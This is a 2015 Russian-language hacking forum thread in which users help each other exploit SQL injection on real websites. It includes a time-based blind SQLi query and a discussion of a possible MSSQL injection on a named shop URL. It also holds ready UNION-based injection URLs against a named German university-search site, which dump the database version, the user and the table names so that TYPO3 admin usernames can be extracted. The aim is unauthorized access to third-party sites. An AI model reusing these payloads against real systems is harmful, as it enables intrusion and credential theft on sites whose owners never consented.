10.03.2015, 21:19
|
|
Познающий
Регистрация: 02.12.2010
Сообщений: 79
С нами:
8128406
Репутация:
-2
|
|
Cпасибо парни, помогли
P.S. Спасибо, забыл совсем про отвественость
|
|
|
10.03.2015, 21:34
|
|
Новичок
Регистрация: 29.12.2010
Сообщений: 1
С нами:
8089526
Репутация:
2
|
|
Есть blind sql injection, как правильно узнать длинну получаймой колонки. Использую такой запрос:
Код:
SELECT IF (SUBSTRING(LENGTH(login),{x},1) = {y}, SLEEP(5), 0) FROM users LIMIT 1
где {y} перебираймые значения "0,1,2,3,4,5,6,7,8,9"
Проблема в том, что substring возвращает "0", когда положение {x} вышло за длинну записи. В итоге получается, что при попытке получить второе значение (x=2), а истинная длинна = 5, то получаем, что длинна колонки = 50.
Собственно задача - правильно узнать длинну содержимого колонки, без лишних запросов.
upd. Решено |
|
|
|
10.03.2015, 23:23
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от scr1m77
Есть blind sql injection, как правильно узнать длинну получаймой колонки. Использую такой запрос:
Код:
SELECT IF (SUBSTRING(LENGTH(login),{x},1) = {y}, SLEEP(5), 0) FROM users LIMIT 1
где {y} перебираймые значения "0,1,2,3,4,5,6,7,8,9"
Проблема в том, что substring возвращает "0", когда положение {x} вышло за длинну записи. В итоге получается, что при попытке получить второе значение (x=2), а истинная длинна = 5, то получаем, что длинна колонки = 50.
Собственно задача - правильно узнать длинну содержимого колонки, без лишних запросов. может вместо login пехать что-нить такое: select column_name from information_schema.tables where table_name='users'
|
|
|
|
11.03.2015, 00:54
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами:
8258006
Репутация:
25
|
|
Сообщение от None
http://shop.priddybooks.com/SearchResultsNew.aspx?order=asc&search=123
есть тут что нибудь?
|
|
|
|
11.03.2015, 10:11
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от Br@!ns
есть тут что нибудь?
Есть, mssql-инъекция.
|
|
|
|
11.03.2015, 18:01
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами:
8258006
Репутация:
25
|
|
Сообщение от YaBtr
Есть, mssql-инъекция.
Так же думаю, но раскрутить не получается. Дадите наводку?
|
|
|
|
11.03.2015, 18:02
|
|
Постоянный
Регистрация: 29.08.2010
Сообщений: 448
С нами:
8265206
Репутация:
40
|
|
Сообщение от Br@!ns
есть тут что нибудь?
Сообщение от YaBtr
Есть, mssql-инъекция.
Нету
Присутствует фильтрация символов, в случае ошибки вываливает редирект вот сюда
|
|
|
|
11.03.2015, 18:31
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от 5maks5
Нету
Присутствует фильтрация символов, в случае ошибки вываливает редирект
вот сюдаЧитайте, изучайте!
https://technet.microsoft.com/en-us/library/cc512676.aspx
|
|
|
|
12.03.2015, 13:04
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
С нами:
9650336
Репутация:
662
|
|
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.hochschulkompass.de/studium/suche/profisuche/search/1/studtyp/3.html?tx_szhrksearch_pi1%5Bxtend%5D=1&tx_szhrksearch_pi1%5Bbundesland%5D%5B0%5D=2&tx_szhrksearch_pi1%5Bresults_at_a_time%5D=100&tx_szhrksearch_pi1[pointer]=1&tx_szhrksearch_pi1[detail]=all&tx_szhrksearch_pi1%5Bbesform%5D%5B0%5D=d'+union+select+null,version()||chr(58)||current_user||chr(58)||current_database()+--[/COLOR][/COLOR]
Как выковырять данные be_users.username ?
PS движок типо3, эти данные там есть точно! |
|
|
|
12.03.2015, 18:17
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от DezMond™
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.hochschulkompass.de/studium/suche/profisuche/search/1/studtyp/3.html?tx_szhrksearch_pi1%5Bxtend%5D=1&tx_szhrksearch_pi1%5Bbundesland%5D%5B0%5D=2&tx_szhrksearch_pi1%5Bresults_at_a_time%5D=100&tx_szhrksearch_pi1[pointer]=1&tx_szhrksearch_pi1[detail]=all&tx_szhrksearch_pi1%5Bbesform%5D%5B0%5D=d'+union+select+null,version()||chr(58)||current_user||chr(58)||current_database()+--[/COLOR][/COLOR]
Как выковырять данные be_users.username ?
PS движок типо3, эти данные там есть точно! уверены?
Код:
http://www.hochschulkompass.de/studium/suche/profisuche/search/1/studtyp/3.html
?tx_szhrksearch_pi1[xtend]=1
&tx_szhrksearch_pi1[bundesland][0]=2
&tx_szhrksearch_pi1[results_at_a_time]=100
&tx_szhrksearch_pi1[pointer]=1
&tx_szhrksearch_pi1[detail]=all
&tx_szhrksearch_pi1[besform][0]=d'+union+select+null,table_name+from+information_schema.tables--
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
